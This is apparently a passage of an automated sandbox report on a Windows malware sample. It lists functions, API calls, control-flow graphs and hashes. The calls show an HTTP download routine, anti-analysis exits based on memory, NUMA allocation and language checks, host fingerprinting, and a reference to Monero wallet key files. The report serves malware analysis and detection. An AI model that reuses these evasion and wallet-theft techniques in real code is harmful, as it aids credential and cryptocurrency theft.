                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: fc34123f120cfba800df1feeb56144007dfc1a8aa8ce907cc90fc1771350d8a6
                  • Instruction ID: 7f129cc8119026178bd486d9d0bf19b16ef474754190779c8152d7f6d099691d
                  • Opcode Fuzzy Hash: fc34123f120cfba800df1feeb56144007dfc1a8aa8ce907cc90fc1771350d8a6
                  • Instruction Fuzzy Hash: 67624FB55002C0AFC354EFA8EDC89567BF9F74C301705853EA605CB266D639B8A5CF1A
                  Function 002A6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 2a6280-2a630b call 2ba7a0 call 2a47b0 call 2ba740 InternetOpenA StrCmpCA 1040 2a630d 1033->1040 1041 2a6314-2a6318 1033->1041 1040->1041 1042 2a6509-2a6525 call 2ba7a0 call 2ba800 * 2 1041->1042 1043 2a631e-2a6342 InternetConnectA 1041->1043 1062 2a6528-2a652d 1042->1062 1045 2a6348-2a634c 1043->1045 1046 2a64ff-2a6503 InternetCloseHandle 1043->1046 1047 2a635a 1045->1047 1048 2a634e-2a6358 1045->1048 1046->1042 1050 2a6364-2a6392 HttpOpenRequestA 1047->1050 1048->1050 1052 2a6398-2a639c 1050->1052 1053 2a64f5-2a64f9 InternetCloseHandle 1050->1053 1055 2a639e-2a63bf InternetSetOptionA 1052->1055 1056 2a63c5-2a6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 2a642c-2a644b call 2b8940 1056->1058 1059 2a6407-2a6427 call 2ba740 call 2ba800 * 2 1056->1059 1066 2a64c9-2a64e9 call 2ba740 call 2ba800 * 2 1058->1066 1067 2a644d-2a6454 1058->1067 1059->1062 1066->1062 1069 2a6456-2a6480 InternetReadFile 1067->1069 1070 2a64c7-2a64ef InternetCloseHandle 1067->1070 1073 2a648b 1069->1073 1074 2a6482-2a6489 1069->1074 1070->1053 1073->1070 1074->1073 1078 2a648d-2a64c5 call 2ba9b0 call 2ba8a0 call 2ba800 1074->1078 1078->1069
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • InternetOpenA.WININET(002C0DFE,00000001,00000000,00000000,00000000), ref: 002A62E1
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002A63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002A63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002A63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002A646D
                  • InternetCloseHandle.WININET(00000000), ref: 002A64EF
                  • InternetCloseHandle.WININET(00000000), ref: 002A64F9
                  • InternetCloseHandle.WININET(00000000), ref: 002A6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 62eb190d700e177c4038aa74f315afdc842c3a82fc26a0be133aa517e7979e41
                  • Instruction ID: 7952eefe1e1cea217175d15c50a886bcb92716a64eda3ab1401343b96fe15021
                  • Opcode Fuzzy Hash: 62eb190d700e177c4038aa74f315afdc842c3a82fc26a0be133aa517e7979e41
                  • Instruction Fuzzy Hash: C7715F71A20218ABDB24DFA0CC99FEEB774FB49700F148198F10A6B1D1DBB46A95CF51
                  Function 002B5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 2b5510-2b5577 call 2b5ad0 call 2ba820 * 3 call 2ba740 * 4 1106 2b557c-2b5583 1090->1106 1107 2b55d7-2b564c call 2ba740 * 2 call 2a1590 call 2b52c0 call 2ba8a0 call 2ba800 call 2baad0 StrCmpCA 1106->1107 1108 2b5585-2b55b6 call 2ba820 call 2ba7a0 call 2a1590 call 2b51f0 1106->1108 1134 2b5693-2b56a9 call 2baad0 StrCmpCA 1107->1134 1137 2b564e-2b568e call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1107->1137 1124 2b55bb-2b55d2 call 2ba8a0 call 2ba800 1108->1124 1124->1134 1140 2b56af-2b56b6 1134->1140 1141 2b57dc-2b5844 call 2ba8a0 call 2ba820 * 2 call 2a1670 call 2ba800 * 4 call 2b6560 call 2a1550 1134->1141 1137->1134 1142 2b57da-2b585f call 2baad0 StrCmpCA 1140->1142 1143 2b56bc-2b56c3 1140->1143 1272 2b5ac3-2b5ac6 1141->1272 1161 2b5991-2b59f9 call 2ba8a0 call 2ba820 * 2 call 2a1670 call 2ba800 * 4 call 2b6560 call 2a1550 1142->1161 1162 2b5865-2b586c 1142->1162 1146 2b571e-2b5793 call 2ba740 * 2 call 2a1590 call 2b52c0 call 2ba8a0 call 2ba800 call 2baad0 StrCmpCA 1143->1146 1147 2b56c5-2b5719 call 2ba820 call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1143->1147 1146->1142 1250 2b5795-2b57d5 call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1146->1250 1147->1142 1161->1272 1167 2b598f-2b5a14 call 2baad0 StrCmpCA 1162->1167 1168 2b5872-2b5879 1162->1168 1197 2b5a28-2b5a91 call 2ba8a0 call 2ba820 * 2 call 2a1670 call 2ba800 * 4 call 2b6560 call 2a1550 1167->1197 1198 2b5a16-2b5a21 Sleep 1167->1198 1174 2b587b-2b58ce call 2ba820 call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1168->1174 1175 2b58d3-2b5948 call 2ba740 * 2 call 2a1590 call 2b52c0 call 2ba8a0 call 2ba800 call 2baad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 2b594a-2b598a call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1175->1276 1197->1272 1198->1106 1250->1142 1276->1167
                  APIs
                    • Part of subcall function 002BA820: lstrlen.KERNEL32(002A4F05,?,?,002A4F05,002C0DDE), ref: 002BA82B
                    • Part of subcall function 002BA820: lstrcpy.KERNEL32(002C0DDE,00000000), ref: 002BA885
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5857
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5228
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5318
                    • Part of subcall function 002B52C0: lstrlen.KERNEL32(00000000), ref: 002B532F
                    • Part of subcall function 002B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 002B5364
                    • Part of subcall function 002B52C0: lstrlen.KERNEL32(00000000), ref: 002B5383
                    • Part of subcall function 002B52C0: lstrlen.KERNEL32(00000000), ref: 002B53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 002B5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 6df79d99c9c3137ce8806482ad3f6366fd385469c491e345cae8c012ab151b99
                  • Instruction ID: 847a57f2fd9ff50b32f00603341a8bba80a4cd1da083cf8c84f5a2e7f089b3b9
                  • Opcode Fuzzy Hash: 6df79d99c9c3137ce8806482ad3f6366fd385469c491e345cae8c012ab151b99
                  • Instruction Fuzzy Hash: 0BE11171930104AACB14FBA0DC97EED7378AF54380F508568B5176A592EF346E39CFA2
                  Function 002B17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 2b17a0-2b17cd call 2baad0 StrCmpCA 1304 2b17cf-2b17d1 ExitProcess 1301->1304 1305 2b17d7-2b17f1 call 2baad0 1301->1305 1309 2b17f4-2b17f8 1305->1309 1310 2b17fe-2b1811 1309->1310 1311 2b19c2-2b19cd call 2ba800 1309->1311 1313 2b199e-2b19bd 1310->1313 1314 2b1817-2b181a 1310->1314 1313->1309 1316 2b1849-2b1858 call 2ba820 1314->1316 1317 2b18cf-2b18e0 StrCmpCA 1314->1317 1318 2b198f-2b1999 call 2ba820 1314->1318 1319 2b18ad-2b18be StrCmpCA 1314->1319 1320 2b1821-2b1830 call 2ba820 1314->1320 1321 2b187f-2b1890 StrCmpCA 1314->1321 1322 2b185d-2b186e StrCmpCA 1314->1322 1323 2b1913-2b1924 StrCmpCA 1314->1323 1324 2b1932-2b1943 StrCmpCA 1314->1324 1325 2b18f1-2b1902 StrCmpCA 1314->1325 1326 2b1951-2b1962 StrCmpCA 1314->1326 1327 2b1970-2b1981 StrCmpCA 1314->1327 1328 2b1835-2b1844 call 2ba820 1314->1328 1316->1313 1348 2b18ec 1317->1348 1349 2b18e2-2b18e5 1317->1349 1318->1313 1346 2b18ca 1319->1346 1347 2b18c0-2b18c3 1319->1347 1320->1313 1344 2b189e-2b18a1 1321->1344 1345 2b1892-2b189c 1321->1345 1342 2b187a 1322->1342 1343 2b1870-2b1873 1322->1343 1329 2b1930 1323->1329 1330 2b1926-2b1929 1323->1330 1331 2b194f 1324->1331 1332 2b1945-2b1948 1324->1332 1350 2b190e 1325->1350 1351 2b1904-2b1907 1325->1351 1333 2b196e 1326->1333 1334 2b1964-2b1967 1326->1334 1336 2b198d 1327->1336 1337 2b1983-2b1986 1327->1337 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 2b18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 002B17C5
                  • ExitProcess.KERNEL32 ref: 002B17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 63767470ee0e7c17d73beb257c7ec66bd5d6dc07a08c249b04b7ead10bc55da1
                  • Instruction ID: dc36b04cf6f803ab2bbc1edaa0a60a8a947e8fb499534a9b1acbda0c86f8983b
                  • Opcode Fuzzy Hash: 63767470ee0e7c17d73beb257c7ec66bd5d6dc07a08c249b04b7ead10bc55da1
                  • Instruction Fuzzy Hash: 7C515AB4A20249EFDB04DFA0D9A4BFE77B5BF44784F508068E506AB241D770E971CB62
                  Function 002B7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 2b7500-2b754a GetWindowsDirectoryA 1357 2b754c 1356->1357 1358 2b7553-2b75c7 GetVolumeInformationA call 2b8d00 * 3 1356->1358 1357->1358 1365 2b75d8-2b75df 1358->1365 1366 2b75fc-2b7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 2b75e1-2b75fa call 2b8d00 1365->1367 1369 2b7619-2b7626 call 2ba740 1366->1369 1370 2b7628-2b7658 wsprintfA call 2ba740 1366->1370 1367->1365 1377 2b767e-2b768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 002B7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002B757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B760A
                  • wsprintfA.USER32 ref: 002B7640
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\$,
                  • API String ID: 1544550907-2700797820
                  • Opcode ID: 22e9369b29198f412002eebcc3741a586a44f49217d44b0d2c7195899afc088f
                  • Instruction ID: e814d0f624e0bcf9dc8193dedc9bd6894e13bcc8eea78958152686f8a6f325c7
                  • Opcode Fuzzy Hash: 22e9369b29198f412002eebcc3741a586a44f49217d44b0d2c7195899afc088f
                  • Instruction Fuzzy Hash: 3541B2B1D14248ABDF10DFA4DC95BEEBBB8EF48740F100099F5096B281DB74AA54CFA5
                  Function 002B69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51770), ref: 002B98A1
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51788), ref: 002B98BA
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D516E0), ref: 002B98D2
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D516B0), ref: 002B98EA
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51698), ref: 002B9903
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D58B78), ref: 002B991B
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D45428), ref: 002B9933
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D45448), ref: 002B994C
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51650), ref: 002B9964
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D517B8), ref: 002B997C
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51668), ref: 002B9995
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D517D0), ref: 002B99AD
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D45508), ref: 002B99C5
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D515C0), ref: 002B99DE
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002A11D0: ExitProcess.KERNEL32 ref: 002A1211
                    • Part of subcall function 002A1160: GetSystemInfo.KERNEL32(?), ref: 002A116A
                    • Part of subcall function 002A1160: ExitProcess.KERNEL32 ref: 002A117E
                    • Part of subcall function 002A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002A112B
                    • Part of subcall function 002A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 002A1132
                    • Part of subcall function 002A1110: ExitProcess.KERNEL32 ref: 002A1143
                    • Part of subcall function 002A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002A123E
                    • Part of subcall function 002A1220: __aulldiv.LIBCMT ref: 002A1258
                    • Part of subcall function 002A1220: __aulldiv.LIBCMT ref: 002A1266
                    • Part of subcall function 002A1220: ExitProcess.KERNEL32 ref: 002A1294
                    • Part of subcall function 002B6770: GetUserDefaultLangID.KERNEL32 ref: 002B6774
                    • Part of subcall function 002A1190: ExitProcess.KERNEL32 ref: 002A11C6
                    • Part of subcall function 002B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002A11B7), ref: 002B7880
                    • Part of subcall function 002B7850: RtlAllocateHeap.NTDLL(00000000), ref: 002B7887
                    • Part of subcall function 002B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002B789F
                    • Part of subcall function 002B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7910
                    • Part of subcall function 002B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002B7917
                    • Part of subcall function 002B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002B792F
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002B6AF9
                  • Sleep.KERNEL32(00001770), ref: 002B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6B1A
                  • ExitProcess.KERNEL32 ref: 002B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: ca5bba94120fc99881ee0510bd679a451d3ddd2f43c308841e2c749439a69afb
                  • Instruction ID: 59882fd22ae974936372abef7d93686a460a07ff5a9d27e0901746188ee2e230
                  • Opcode Fuzzy Hash: ca5bba94120fc99881ee0510bd679a451d3ddd2f43c308841e2c749439a69afb
                  • Instruction Fuzzy Hash: CC312B71920208ABDB04FBF0DC97BEE7778AF45380F504528F212A6192DF746935DEA6
                  Function 002A1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 2a1220-2a1247 call 2b89b0 GlobalMemoryStatusEx 1439 2a1249-2a1271 call 2bda00 * 2 1436->1439 1440 2a1273-2a127a 1436->1440 1442 2a1281-2a1285 1439->1442 1440->1442 1444 2a129a-2a129d 1442->1444 1445 2a1287 1442->1445 1447 2a1289-2a1290 1445->1447 1448 2a1292-2a1294 ExitProcess 1445->1448 1447->1444 1447->1448
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002A123E
                  • __aulldiv.LIBCMT ref: 002A1258
                  • __aulldiv.LIBCMT ref: 002A1266
                  • ExitProcess.KERNEL32 ref: 002A1294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
